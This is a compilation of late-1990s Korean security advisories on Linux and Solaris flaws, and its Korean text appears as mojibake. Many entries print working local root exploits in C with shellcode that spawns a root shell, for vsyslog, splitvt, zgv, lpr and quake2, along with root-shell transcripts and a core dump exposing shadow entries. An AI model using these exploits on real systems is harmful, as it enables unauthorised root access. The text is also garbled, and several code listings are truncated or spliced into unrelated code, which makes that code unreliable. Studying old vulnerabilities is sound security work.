Professional Documents
Culture Documents
¸íÉ
net/unix/garbage.c
½Ã½ºÅÛ
Ä¿³Î 2.0.x
¹®Á¦Á¡
NR_FILE (or /proc/sys/kernel/file-max)À» 1024 º¸´Ù ´õ Å©°Ô ÇϹÇνá
¹®Á¦°¡ ¹ß»ýÇÒ ¼ö ÀÖ´Ù.
±×¿¡ ´ëÇÑ ¼Ò½º´Â °ø°³ÇÏÁö ¾Ê°Ú´Ù.
¿Ö³Ä.. ¾ÆÁ÷ ÇØ°á ¹æ¹ýÀÌ ¾ø´Â µíÇÏ´Ù.
2.0.33¹öÁ‾À» ±ò¾Æº¸¾Æµµ ¿ª½Ã ¹ö±×°¡ »ý±ä´Ù.
ÇØ°áÃ¥
±Ã¿©ÁöÃ¥À¸Î °¢À‾ÀúÀÇ ÇÁμ¼½º¸¦ 6°³ ¹Ì¸¸À¸Î ÇÒ´ç ½ÃÅ°´Â °ÍÀÌ´Ù.
---------------------------
Á¦ ¸ñ: [º¸¾È] ¸®´ª½º vsyslog()
¸íÉ
vsyslog() overflow
½Ã½ºÅÛ
Linux with libc 5.4.23 and RH 5.3.12-18
¹®Á¦Á¡
ÀÌ ¹®Á¦Á¡Àº libc 5.4.38¿¡¼ °íÃÄÁ³´Ù.
vsyslog()ÇÔ¼ö¸¦ ¹öÆÛ ¿À¹ö ÇÃÎ¿ì ½ÃÄÑ À̸¦ ÀÌ¿ëÇÑ´Ù.
$ id
uid=100(guest)
$ ln -s /bin/su hahaha
$ export PATH=.:$PATH
$ hahaha
Password:
# id
uid=0(root) gid=0(root)
# tail -1 /var/log/messages
Jan 6 00:37:36 guest hahaha: root on /dev/ttyp2
À̱ ½ÄÀ¸Î µÈ´Ù. ¿ø¡ su ¸¦ Çؼ çƮΠµÇ¾úÀ»¶§´Â
Jan 6 00:37:36 guest su: root on /dev/ttyp2
Î µÇ¾î¾ß ÇÑ´Ù.
¿©±â¿¡´Â ¾î¶² º¸¾È»ó ÇêÁ¡ÀÌ ¾ø´Ù. ÇÏÁö¸¸ ÀÌ°ÍÀº openlog()À» À§ÇÑ
argv[0]À» »ç¿ëÇϴµ¥ ¾î¶² °¡´É¼ºÀÌ º¸ÀδÙ.
ÀÌ°ÍÀ» ´õ ÀÚ¼¼ÇÏ°Ô º¸À̸é..
½© Äڵ忡 '/' ¸¦ ¾µ¼ö ¾ø´Â °ü°èÎ.. _bin_sh ¶ó°í ½©Äڵ忡 ¸í½ÃµÇ¾î
ÀÖ´Ù. ±×¸®ÇÏ¿© /bin/sh ¸¦ _bin_sh Î º¹»çÇصξî¶ó.
±×¸®°í ÇöÀçÀÇ PATH ¿¡ '.'¸¦ Ãß°¡ ½ÃÄѶó.
±×¸®°í³ª¼ ÀÌ ÇÁαץÀ» µ¹Á¾ß ÇÑ´Ù.
/*
vsyslog()/openlog() exploit by BiT - 8/8 1997
Greets to: doodle, skaut, melon, kweiheri etc.
*/
#include
#include
unsigned long get_esp(void)
{
__asm__("movl %esp, %eax");
}
void main(int argc, char **argv)
{
unsigned char shell[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff_bin_sh";
char *buf,*p;
unsigned long *adr;
int i;
if((p=buf=malloc(2028+28)) == NULL)
exit(-1);
memset(p,0x90,2028);
p+=2028-strlen(shell);
for(i=0;i
int main()
{
char ident[4096];
memset(ident, 'x', sizeof(ident));
ident[sizeof(ident) - 1] = 0;
openlog(ident, 0, LOG_AUTHPRIV);
syslog(LOG_NOTICE, "message");
return 0;
}
À̸¦ °íÄ¡Á¸é ÀÌ°÷¿¡¼ ÆÐÄ¡Ç϶ó
http://www.false.com/security/linux-stack/
---------------------------
Á¦ ¸ñ: [º¸¾È] ¸®´ª½º&À‾´Ð½º X¼¹öR5,R6
¸íÉ
X¼¹ö X11R6 , X11R5
½Ã½ºÅÛ
X11R6 ÀÌ ±ò¸° ½Ã½ºÅÛ
¹®Á¦Á¡
X11R6À» ½Ã½ºÅÛ¿¡ ÀνºÅç½Ã setuid ³ª setgid °¡ ºÙ´Â´Ù.
XF86_µå¶óÀ̺ê À̱°ÍµéÀº setuid °¡ root ÀÌ´Ù.
±×‾³ª ÎÄÃÀ‾Àú°¡ ¹öÆÛ ¿À¹ö±À» ÀÌ¿ëÇؼ Æ‾º°ÇÑ ±ÇÇÑÀ» °¡Áö°Ô µÉ¼ö
ÀÖ´Ù.
¿¢½º ¼¹ö°¡ ½ÃÀµÇ´ µ¿¾È¿¡ ResetHosts() ÇÔ¼ö¸¦ È£ÃâÇÑ´Ù.
±×²¶§ display ¸¦
X :00000000000000000000000000000000000000000000000000000000000000000\
00000000000000000000000000000000000000000000000000000000000000000000\
00000000000000000000000000000000000000000000000000000000000000000000\
00000000000000000000000000000000000000000000000000000000000000000000\
00000000000000000000000000000000000000000000000000000000000000000000\
00000000000000000000000000000000000000000000000000000000000000000000\
00000000000000000000000000000000000000000000000000000000000000000009
À̱ ½ÄÀ¸Î ¼³Á¤ÇÒ¶§... ¹öÆÛ ¿À¹ö ÇÃο츦 ÀÏÀ¸Å³¼ö ÀÖ´Â ÀáÀçÂÀ»
°¡Áö°í ÀÖ´Ù.
ÇØ°áÃ¥
1) ¿¢½º ¼¹ö¸¦ ÀνºÅç ÇÑÈÄ ¸ðµç setuid ³ª setgid ¸¦ ¾ø¾Ö¶ó.
2) xdmÀ» ¾²°Å³ª ¾ÈÀüÇÑ setuid ¿ÍÆÛÎ X¼¹ö¸¦ ½ÃÀÛÇضó.
ÀÌ°ÍÀº ¹ö±×¿¡ µû¸¥ ¿ÍÆÛÀÌ´Ù.
¼³Ä¡ ¹ýÀº ¿µ¾îÎ °£´ÜÇÏ°Ô ½áÀÖÀ¸¹ÇÎ Àß º¸¸é¼ ¼³Ä¡Çضó.
/*
Description: X server wrapper
Instalation steps:
0. Become root (su -)
1. Modify the X_Server program variable according to your
taste (i.e. the X server true path, not the link to it!)
2. Compile this program as
cc Xserver.c -O4 -o Xserver
3. Copy the resulting binary to /usr/X11/bin, or whatever
path you may have
4. chmod 04711 Xserver
5. Suppose your X server is called "XF86_S3"; issue a command
chmod 0711 XF86_S3
6. Remove the old link for X (e.g X -> /usr/X11/bin/XF86_S3)
7. Make a new link
ln -s /usr/X11/bin/Xserver /usr/X11/bin/X
Copyright policy: the GNU Public License.
This program is intended as a temporary patch for an existing
X server; it is provided "as is", the author is not
responsible for any direct/indirect damage(s) caused by its
use.
*/
#include
#include
#include
#include
#include
#include
/*
This is intended for debugging porposes only.
Do NOT define this for a normal usage!!
*/
#define _DEBUG
#define SIZE 1024
/* guaranteed filled with NULLs by UNIX */
char* args[SIZE];
int argsCount = 0;
char* sccsID =
"@(#) X wrapper 1.0 Copyright (C) 1998 by Vadimir COTFAS (ulianov@mecanica
.math.unibuc.ro), Jan 14th 1998";
char *X_Server = "/usr/X11/bin/XF86_S3";
int main(int argc, char* argv[])
{
int i;
uid_t uid, euid;
struct passwd* pass;
openlog("Xserver", LOG_CONS|LOG_NDELAY|LOG_PERROR|LOG_PID,
LOG_AUTHPRIV);
uid = getuid(); euid = geteuid();
if(!((uid==0) || (euid==0))){
fprintf(stderr,"Xserver: this program must be run as (setuid) root\n")
;
exit(1);
}
pass = getpwuid(uid);
for(i=0; i 2)){
syslog(LOG_NOTICE, "potential buff ovrflw at arg #%d user %s",
i, pass->pw_name);
continue;
}
if(strstr(argv[i], "-config")){
syslog(LOG_NOTICE, "security vulnerability at arg #%d user %s \n",
i, pass->pw_name);
i++;
continue;
}
if(argsCount >= SIZE){
syslog(LOG_NOTICE, "too many args (>1024) user %s \n
",
pass->pw_nam
e);
exit(1);
}
args[argsCount++] = argv[i];
}
args[argsCount] = NULL; /* just to be sure */
#ifdef DEBUG
for(i=0; i
#include
int _init() {
char *sh[2];
sh[0] = "/bin/sh";
sh[1] = NULL;
setuid(0);
setgid(0);
seteuid(0);
execve(sh[0], sh, NULL);
}
ÇØ°áÃ¥
chmod u-s quake2 °ÔÀÓÀº È¥ÀÚÇÏ´Â °Å´Ï±ñ setuid ¸¦ ¾ø¾Ö´Â °ÍÀÌ ³´´Ù.
¹Ýµå½Ã ÇØ¾ß ÇÒ »óȲÀ̶ó¸é
http://synergy.caltech.edu/~ggi/ ¿¡ °¡¸é ÇØ°áÃ¥ÀÌ ÀÖ´Ù.
---------------------------
Á¦ ¸ñ: [º¸¾È] ¸®´ª½º imapd (2)
¸íÉ
imapd , ipop3d
½Ã½ºÅÛ
½½¢ 3.3(imapd ¸¸ ÇØ´ç), ½½¢ 3.4
¹®Á¦Á¡
Ãʱ⠽½¢¿þ¾î¿¡¼´Â ÀÌ ¹ö±×°¡ Çã¿ëµÇÁö ¾Ê¾Ò´Ù.
¾Ë¼ö ¾ø´Â À‾Àú°¡ µé¾î¿ÀÁÇÒ¶§ imapd ¿Í ipop3d µ¥¸óÀº
ÄÚ¾î ´ýÇÁ¸¦ ÀÏÀ¸Å²´Ù.
±×±µ¥ ±× ÆÄÀÏ¿¡ ½¦µµ¿ì ÆÄÀÏÀÌ Ã°¡µÇ¾îÀÖ´Ù.
±× ÀÌÀ‾´Â µÎ°³ÀÇ µ¥¸óµéÀÌ À‾Àú¸¦ α×ÀνÃÅ°Á¸é ½¦µµ¿ì ÆÄÀÏÀ»
ÀоîµéÀ̱⠶§¹®ÀÌ´Ù. À̶§ ÄÚ¾î ´ýÇÁ°¡ »ý°Ü¼ / µðºÅ丮¿¡
core ÆÄÀÏÀÌ »ý±ä´Ù.
[root@koek] /# telnet host 110
Trying 10.10.13.1...
Connected to host.com
Escape character is '^]'.
@
+OK some host POP3 3.3(20) w/IMAP2 client (Comments t
o
MRC@CAC.Washingto
n.EDU) at Sun, 1 Feb 1998 23:45:06 +0100 (CET)
user root
+OK User name accepted, password please
pass linux
[this is not the correct password]
-ERR Bad login
user john
[no user named john]
+OK User name accepted, password please
pass doe
Connection closed by foreign host.
/ µðºÅ丮¿¡ °£ÈÄ¿¡
[root@zopie] /# strings core | grep -A3 root
root
[crypted pw here]
10244
Sun Feb 1 23:45:15 1998
--
root:[crypted pw here]:10244:0:::::
halt:*:9797:0:::::
operator:*:9797:0:::::
shutdown:*:9797:0:::::
[looks like /etc/shadow]
--
root:[crypted pw here]:10244:0:::::
john
host.com
PASS
ÇØ°áÃ¥
¿ì¼±Àº ¸¾ÆµÎ¸ç ÆÐÄ¡ ¹öÁ‾ÀÌ ³ª¿Ã¶§±îÁö ±â´Ù¸°´Ù.
---------------------------
Á¦ ¸ñ: [º¸¾È] ¸®´ª½º xServer (À§Çè)
* ÀÌ ¹ö±×´Â »ó´çÈ÷ À§ÇèÇÑ ¹ö±×À̹ÇÎ Àý´ëÎ ¾Ç¿ëÇÏÁö ¸»±æ
¹Ù¶õ´Ù. ºÎŹÀÌ´Ù.
¸íÉ
XServer
½Ã½ºÅÛ
ÀÎÅÚ x86ÀÇ ¿¢½º ¼¹ö
¹®Á¦Á¡
¿¢½º ¼¹öÀÇ ¹®Á¦Á¡Àº °ú°Å¿¡ ºÎÅÍ ¹®Á¦Á¡ÀÌ Á¦±âµÇ¾î¿Ô´Ù.
µð½º ÇùÀ̸¦ xxΠä¿ö¼ ¼¼±×¸ÕÆ® ÆúÆ®¸¦ ³ª¿À°Ô ÇÑ °ÍÀº
¹öÆÛ ¿À¹ö ÇÃοìÀÇ °¡´É¼ºÀ» º¸¿©ÁÖ¾ú´Ù.
´ÙÀ½°ú °°Àº ¼Ò½ºÎ ÀÏ¹Ý »ç¿ëÀÚ°¡ çÆ®¸¦ ¾òÀ» ¼ö ÀÖ´Ù.
ÇØ°áÃ¥
¿ì¼±Àº ¼ÂÀ‾Àú ¾ÆÀ̵𸦠¾ø¾Ö¶ó..
¶ÇÇÑ /usr/X11R6 µðºÅ丮ÀÇ Æ۹̼ÇÀ» 750 À¸Î Çصΰí
±×ìÀ» Á¤Çؼ ÇÊ¿äÇÑ »ç¶÷¸¸ ¾²°Ô Çضó.
---------------------------
Á¦ ¸ñ: [º¸¾È] ¸®´ª½º cron
¸íÉ
vixie cron
½Ã½ºÅÛ
vixie cron(¹öÁ‾ 3.0.1-20ÀÌÇÏ)ÀÌ ¼³Ä¡µÈ ¸®´ª½º,BSD
¹®Á¦Á¡
/usr/bin/crontab Àº ¼ÂÀ‾Àú ¾ÆÀ̵𰡠çƮΠºÙ¾îÀÖ´Ù.
±×±µ¥ ¸Å½Ã°£ À‾Àú¿¡ ÀÇÇØ ºÒÁÁö°Ô µÇ¸é çÆ® ¼ÒÀ‾ÀÇ Àӽà ÅÆÇÁ ÆÄÀÏÀÌ
»ý±ä´Ù.
ÀÌ ÆÄÀÏÀº /var/spool/cron µðºÅ丮 ÀÌ´Ù.
±×±µ¥ À̶§ ¸¸µé¾îÁö´Â Àӽà ÆÄÀϵéÀº Àڽſ¡°Ô ÇÒ´çµÈ ÄõÅÍ¿¡ ¿µÇâÀ»
¹ÞÁö ¾Ê´Â °æÇâÀÌ ÀÖ´Ù.
ÀÌ¿¡ ÄõÅÍ¿¡ »ó°ü¾øÀÌ µð½ºÅ© full À» ¸¸µé ¼ö ÀÖ´Ù.
¾î¶² ÀÏÃÀÇ °úÁ¤À» ÇÏ°Ô µÇ¸é À̸°Ô µÈ´Ù.
[root@genome /]# ls -l /var/spool/cron
total 25106
-rw------- 1 root root 769 Nov 27 20:21 root
-rw------- 1 root lcamtuf 5120000 Feb 5 15:01 tmp.453
-rw------- 1 root lcamtuf 5120000 Feb 5 15:02 tmp.468
-rw------- 1 root lcamtuf 5120000 Feb 5 15:03 tmp.469
-rw------- 1 root lcamtuf 5120000 Feb 5 15:03 tmp.482
-rw------- 1 root lcamtuf 5120000 Feb 5 15:03 tmp.483
À̸°Ô µÇ¾î ³ªÁß¿£ ÆÄÀÏÀÌ ²ËÂ÷°Ô µÈ´Ù.
ÇØ°áÃ¥
¾ÆÁ÷ ³ª¿ÍÀÖ´Â ¶ÑÇÇÑ ÇØ°áÃ¥Àº ¾ø´Ù..
´ÜÁö suid ¸¦ ¾ø¾Ö´Â ¼ö ¹Û¿¡..
chmod 700 /usr/bin/crontab ¸¦ ÀÓ½ÃÎ ÇØÁÖ¸é µÈ´Ù.
---------------------------
Á¦ ¸ñ: [º¸¾È] SUNOS tmpfs
¸íÉ
tmpfs
½Ã½ºÅÛ
SunOS 4.1.4
¹®Á¦Á¡
¾ß¸¶¸ð¸® ŸÄɳ븮¾¾°¡ ¹ß°ßÇÑ °ÍÀÌ´Ù. tmpfs ¿¡ ¹®Á¦°¡ ÀÖ´Ù.
ÀÌ ¹ö±×Î ÀÎÇØ Ä¿³Î ÆдÐÀ» ÀÏÀ¸Å°¸é¼ ½Ã½ºÅÛÀÌ Á״´Ù.
½ºÅ©¸°À̳ª ±âŸ ¸ÖƼΠµÎ°³Î Á¢¼ÓÀ» ÇÑ´Ù.
¾Æ´Ï¸é ½ºÅ©¸°À̶ó´Â ±â´ÉÀ» ÀÌ¿ëÇؼ ȸéÀ» µÎ°³Î ³ª´©´øÁö..
$ /tmp
$ mkdir a
$ cd a
$ vi b (bÆÄÀÏÀ» ¿°í¼ ¾Æ¹«±ÛÀ̳ª ¾´´Ù. ±×»óÅ¿¡¼...)
[ switch screen ] <=(½ºÅ©¸°ÀÇ °æ¿ì ´Ù¸¥ ½ºÅ©¸°À¸Î ¹Ù²Ù¾î¶ó.& ¸ÖƼ)
$ rm -r /tmp/a
[ switch screen ] <=(´Ù½Ã ¿ø¡»óÅÂÎ °£´ÙÀ½..ÀúÀåÇغÁ¶ó....)
(save the file using :w in vi)
Ä¿³Î ÆдÐÀ» ÀÏÀ¸Å°¸é¼ ½Ã½ºÅÛÀÌ Á״´Ù.
ÇØ°áÃ¥
ÆÐÄ¡ ¹øÈ£ 103314-01 À» ¼±»çÀÌÆ®¿¡¼ ã¾Æ¼ ÆÐÄ¡Ç϶ó
---------------------------
Á¦ ¸ñ: [º¸¾È] ¼Ö¶ó¸®½º volrmmount
¸íÉ
volrmmount
½Ã½ºÅÛ
SunOS 5.6 (sparc and x86)
¹®Á¦Á¡
volrmmountÇÁαץÀº setuid °¡ °É¸° ÇÁαץÀ¸Î½á ¸ðµçÀ‾Àúµé¿¡°Ô
¸Åü(media)¸¦ ¿°Å³ª ³ÖÀ»¼ö ÀÖ°Ô Çã¶ôÇØÁØ´Ù.
±×±µ¥ ÀÌ ÇÁαץÀ» °ø°ÝÇÒ ¼ö°¡ ÀÖ´Ù. ±×°Í¿¡ ÀÇÇØ ÀÏ¹Ý »ç¿ëÀÚµéÀÌ
±× ½Ã½ºÅÛÀÇ ¾î¶² ÆÄÀÏÀ̵çÁö º¼¼ö ÀÖ°í, çÆ®ÀÇ ±ÇÇÑÀ» ȹµæÇÒ¼öµµ ÀÖ´Ù.
ÇØ°áÃ¥
´ÙÀ½ÀÇ ÆÐÄ¡ ¹öÁ‾À» °¡Á®¿À¸é µÈ´Ù.
OS version Patch ID
__________ ________
SunOS 5.6 105407-01
SunOS 5.6_x86 105408-01
---------------------------
Á¦ ¸ñ: [º¸¾È] ¼Ö¶ó¸®½º dtappgather (µû²ö~)
¸íÉ
/usr/dt/bin/dtappgather
½Ã½ºÅÛ
CDE ¹öÁ‾ 1.0.2 °¡ ±ò¸° ¼Ö¶ó¸®½º 2.5 2.5.1
¹®Á¦Á¡
/usr/dt/bin/dtappgather ÇÁαץÀº setuid °¡ root Î °ÉÁÀÖ´Â
ÇÁαץÀÌ´Ù.
±×±µ¥ ¼Ö¶ó¸®½º 2.5 2.5.1 ¿¡¼´Â /usr/dt/bin/dtappgather µðºÅ丮°¡
777 ¸ðµåÎ µÇ¾îÀÖ¾î¼ ´©±¸µçÁö ¾²°í ÀÐÀ» ¼ö°¡ ÀÖ´Ù.
( ¼Ö¶ó¸®½º 2.6¿¡¼´Â 755 ¸ðµåÎ µÇ¾îÀÖ´Ù. :-) )
generic-display-0 ¶ó´Â ÆÄÀÏÀ» ¹Ì¸® ¸¸µé¾î ³õ°í setuid °¡ °É¸°
/usr/dt/bin/dtappgather À» ½ÇÇà½ÃÅ°¸é ÆÄÀÏ¿¡ º‾È°¡ ¿Â´Ù.
À̸¦ ÀÌ¿ëÇÏ¸é ½±°Ô ½Ã½ºÅÛÀÇ ¸ðµç ÆÄÀÏÀ» ÀÐ°í ¾²°í ÇÒ ¼ö°¡ ÀְԵȴÙ.
°£´ÜÇϸ鼵µ ¹«¼¿î ¹ö±×ÀÌ´Ù.
ÇØ°áÃ¥
#include
#include
#define DEFAULT_OFFSET -202
#define DEFAULT_BUFFER_SIZE 211
#define DEFAULT_ALIGNMENT 2
#define NOP 0x90
/* This shell code is designed to survive being filtered by toupper()
*/
char shellcode[] =
"\xeb\x20\x5e\x8d\x46\x05\x80\x08\x20\x8d\x46\x27\x80\x08\x20\x40"
"\x80\x08\x20\x40\x80\x08\x20\x40\x40\x80\x08\x20\x40\x80\x08\x20"
"\xeb\x05\xe8\xdb\xff\xff\xff"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/sh";
ÇØ°áÃ¥
chmod 700 squake
---------------------------
Á¦ ¸ñ: [º¸¾È] ¸®´ª½º splitvt
¸íÉ
splitvt(1)
½Ã½ºÅÛ
Linux 2-3.X
¹®Á¦Á¡
ÎÄà À‾Àú°¡ çƮΠα×ÀÎ ÇÒ ¼ö ÀÕ´Ù.
¿À¹ö ÇÃο츦 ÀÏÀ¸Å³ ¼ö°¡ ÀÖ´Ù.
crimson~$ cc -o sp sp.c
crimson~$ sp
bash$ sp
bash$ splitvt
bash# whoami
root
sp.c ---------
long get_esp(void)
{
__asm__("movl %esp,%eax\n");
}
main()
{
char eggplant[2048];
int a;
char *egg;
long *egg2;
char realegg[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
char *eggie = realegg;
egg = eggplant;
*(egg++) = 'H';
*(egg++) = 'O';
*(egg++) = 'M';
*(egg++) = 'E';
*(egg++) = '=';
egg2 = (long *)egg;
for (a=0;a<(256+8)/4;a++) *(egg2++) = get_esp() + 0x3d0 + 0x30;
egg=(char *)egg2;
for (a=0;a<0x40;a++) *(egg++) = 0x90;
while (*eggie)
*(egg++) = *(eggie++);
*egg = 0; /* terminate eggplant! */
putenv(eggplant);
system("/bin/bash");
}
ÇØ°áÃ¥
700 ¸ðµåÎ ÇÏ´Â°Ô »óÃ¥ÀÌ´Ù.
¾Æ´Ï¸é °¢ÀÚÀÇ ¸®´ª½º ÆäÀÌÁöÎ °¡¼ ¾÷±×¡ÀÌÆ®¸¦ ÇÑ´Ù.
---------------------------
Á¦ ¸ñ: [º¸¾È] ¸®´ª½º admin
¸íÉ
admin
½Ã½ºÅÛ
Linux systems running admin-v1.2 and older ones (others?)
¹®Á¦Á¡
admin-v1.2 ÆÐÅ°Áö¿¡ ÀÖ´Â ½Ã½ºÅÛ ¾îµå¹Î Åø¿¡¼ ¹ö±×°¡ ¹ß°ßµÇ¾ú´Ù.
ÎÄà À‾Àú°¡ /tmpµðºÅ丮ÀÇ ¾îµå¹Î Åø °üà ÆÄÀÏÀ» Áö¿ì°í À̸¦ ¸µÅ©
½ÃÄѼ çÆ®ÀÇ ±ÇÇÑÀ¸Î ¾îµðµç ÆÄÀÏÀ» ¸¸µé ¼ö ÀÖ´Ù.
/tmp/name.$$ ¶ó´Â ÆÄÀÏÀÇ ÇüÅÂÎ Á¸ÀçÇÑ´Ù.
ÀÌ ÆÄÀÏÀ» /etc/passwd¿¡ ¿¬°á½ÃÄѼ passwdÆÄÀÏÀ» °íÄ¥ ¼öµµ ÀÖ°í
/.rhosts ¸¦ ¸¸µé ¼öµµ ÀÖ´Ù.
ÇØ°áÃ¥
700 ¸ðµåÎ ¹Ù²ã¶ó
---------------------------
Á¦ ¸ñ: [º¸¾È] ¸®´ª½º svgalib/zgv
¸íÉ
svgalib/zgv
½Ã½ºÅÛ
Redhat Linux 3.0.3 - 4.1
¾î¶² ¸®´ª½ºµçÁö zgv¿¡ setuid root ÀΰÍ
¹®Á¦Á¡
½ºÅà ¿À¹öÖÀÌÆ®¸¦ ÀÏÀ¸ÄѼ ¹öÆÛ ¿À¹ö± °ø°ÝÀ» ½ÃµµÇϸé çÆ®¸¦
¾òÀ» ¼ö ÀÖ´Ù.
zgv-2.7 Àº GIF³ª JPG¸¦ º¼¼ö ÀÖ´Â ºä¾î ÀÌ´Ù.
/*
*
* zgv exploit coded by BeastMaster V on June 20, 1997
*
* USAGE:
* For some strage reason, the filename length of this
* particular exploit must me one character long, otherwise you
* will be dropped into a normal unpriviledged shell. Go Figure....
* Try increasing the offest by increments of 10 if you get
* an Illegal Instruction or Segmentation Fault.
*
* $ cp zgv_exploit.c n.c
* $ cc -o n n.c
* $ ./n
* Oak driver: Unknown chipset (id = 0)
* bash#
*
* EXPLANATION: zgv (suid root) does not check bounds for $HOME env.
*
*/
#include
#include
#include
char *shellcode =
"\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
"\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
"\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
"\xcd\x80/"
"/bin/sh"
"0";
char *get_sp() {
asm("movl %esp,%eax");
}
#define bufsize 4096
char buffer[bufsize];
main() {
int i;
for (i = 0; i < bufsize - 4; i += 4)
*(char **)&buffer[i] = get_sp() -4675;
memset(buffer, 0x90, 512);
memcpy(&buffer[512], shellcode, strlen(shellcode));
buffer[bufsize - 1] = 0;
setenv("HOME", buffer, 1);
n = CHOMP(sk, buf);
buf[n] = '\0';
printf(buf);
SAY(sk, POST);
n = CHOMP(sk, buf);
buf[n] = '\0';
printf(buf);
sleep(2);
printf("Sending overflow data.\n");
while((n = CHOMP(dfd, buf)) > 0)
write(sk, buf, n);
sleep(2);
}
void main(int argc, char **argv)
{
char *victim, *filename;
int s;
me = basename(argv[0]);
if(argc != 3)
usage();
filename = argv[2];
send_egg(s = news_sock(victim = argv[1]), filename);
select_loop(s);
fprintf(stderr, "Connection closed.\n");
printf("Remember: Security is futile. Dweebs WILL own
you.\n");
exit(0);
}
------------------------------------------------------------------
ÇØ°áÃ¥
¾Æ¡ÀÇ »çÀÌÆ®¿¡ °¡¼ ÆÐÄ¡ ¹öÁ‾À» ¹Þ´Â´Ù.
http://www.purplefrog.com/~thoth/netpipes/
---------------------------
Á¦ ¸ñ: [º¸¾È] ¸®´ª½º libXt (2)
¸íÉ
libXt
½Ã½ºÅÛ
RedHat 4.0, 4.1, 4.2
¹®Á¦Á¡
¹öÆÛ ¿À¹öÇÃο츦 ÀÏÀ¸ÄѼ çÆ®¸¦ ¾òÀ» ¼ö ÀÖ´Ù.
ÀÌ°ÍÀº linXtÀÚü°¡ ¹®Á¦°¡ ÀÖÀ¸¹ÇÎ ±× ÆÄ±Þ È¿°ú´Â ¾öû³ª´Ù.
ÇØ°áÃ¥
$ cd /usr/X11/bin
$ find . -type f -a \( -perm -2000 -o -perm -4000 \) -print
À§ÀÇ ¸íÉÀ¸Î setuid rootÀÎ ÆÄÀÏÀ» ã¾Æ¼ ¸ðµÎ setuid¸¦ ¾ø¾Ö¶ó.
¾Æ¡ÀÇ »çÀÌÆ®¿¡¼ Àڽſ¡°Ô ¸Â´Â °ÍÀ» °ñ¶ó ¾÷±×¹ÀÌµå ½ÃÄѶó.
o Red Hat Linux/Alpha 4.1, 4.2
ftp://ftp.redhat.com/updates/4.2/alpha/XFree86-devel-3.2-10.alpha.rpm
ftp://ftp.redhat.com/updates/4.2/alpha/XFree86-libs-3.2-10.alpha.rpm
ftp://ftp.aoy.com/pub/Linux/security/DISTRIBUTION-FIXES/RedHat/XFree86-devel-3.$
ftp://ftp.aoy.com/pub/Linux/security/DISTRIBUTION-FIXES/RedHat/XFree86-libs-3.2$
ftp://ftp.aoy.com/pub/Linux/security/DISTRIBUTION-FIXES/RedHat/XFree86-libs-3.2$
o Red Hat Linux/SPARC 4.0, 4.1, 4.2
ftp://ftp.redhat.com/updates/4.2/sparc/X11R6.1-devel-pl1-21.sparc.rpm
ftp://ftp.redhat.com/updates/4.2/sparc/X11R6.1-libs-pl1-21.sparc.rpm
ftp://ftp.aoy.com/pub/Linux/security/DISTRIBUTION-FIXES/RedHat/X11R6.1-devel-pl$
ftp://ftp.aoy.com/pub/Linux/security/DISTRIBUTION-FIXES/RedHat/X11R6.1-libs-pl1$
---------------------------
Á¦ ¸ñ: [º¸¾È] ¸®´ª½º lpr (2)
¸íÉ
lpr
½Ã½ºÅÛ
Linux 2.0.0, 2.0.30 (SW 3.0)
¹®Á¦Á¡
lpr ffffffffff.......ffff (to 1023 characters)
À§¿Í °°ÀÌ ÇÏ¿© ¹öÆÛ ¿À¹öÇÃο츦 ÀÏÀ¸Å°´Â ¹®Á¦Î çÆ®¸¦ ¾ò´Â´Ù.
/*
* lpr_exploit.c - Buffer overflow exploit for the lpr program.
* Adapted from code found in "stack smashing..." by Aleph One
* aleph1@underground.org
*
* "wisdom is knowledge passed from one to another", Thanks
*/
#include
#define DEFAULT_OFFSET 1023
#define DEFAULT_BUFFER_SIZE 2289
#define NOP 0x90
/*
* The hex representation of the code to produce an interactive shell.
* Oviously since this is for a Linux Box, you may need to generate
*/
char shellcode [] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_sp(void)
{ __asm__("mov %esp,%eax"); }
void main(int argc, char *argv[]) {
char *buff, *ptr;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i;
/* set aside the memory for our shell code */
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
/* Get the address of our stack pointer */
addr = get_sp() - offset;
/* fill our buffer with its address */
ptr = buff;
addr_ptr = (long *)ptr;
for(i = 0; i-- lpr.c --<
/*
* /usr/bin/lpr buffer overflow exploit for Linux with
* non-executable stack
* Copyright (c) 1997 by Solar Designer
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define SIZE 1200 /* Amount of data to overflow with */
#define ALIGNMENT 11 /* 0, 8, 1..3, 9..11 */
#define ADDR_MASK 0xFF000000
char buf[SIZE];
int *ptr;
int pid, pc, shell, step;
int started = 0;
jmp_buf env;
void handler() {
started++;
}
/* SIGSEGV handler, to search in libc */
void fault() {
if (step < 0) {
/* Change the search direction */
longjmp(env, 1);
} else {
/* The search failed in both directions */
puts("\"/bin/sh\" not found, bad luck");
exit(1);
}
}
void error(char *fn) {
perror(fn);
if (pid > 0) kill(pid, SIGKILL);
exit(1);
}
void main() {
signal(SIGUSR1, handler);
/* Create a child process to trace */
if ((pid = fork()) < 0) error("fork");
if (!pid) {
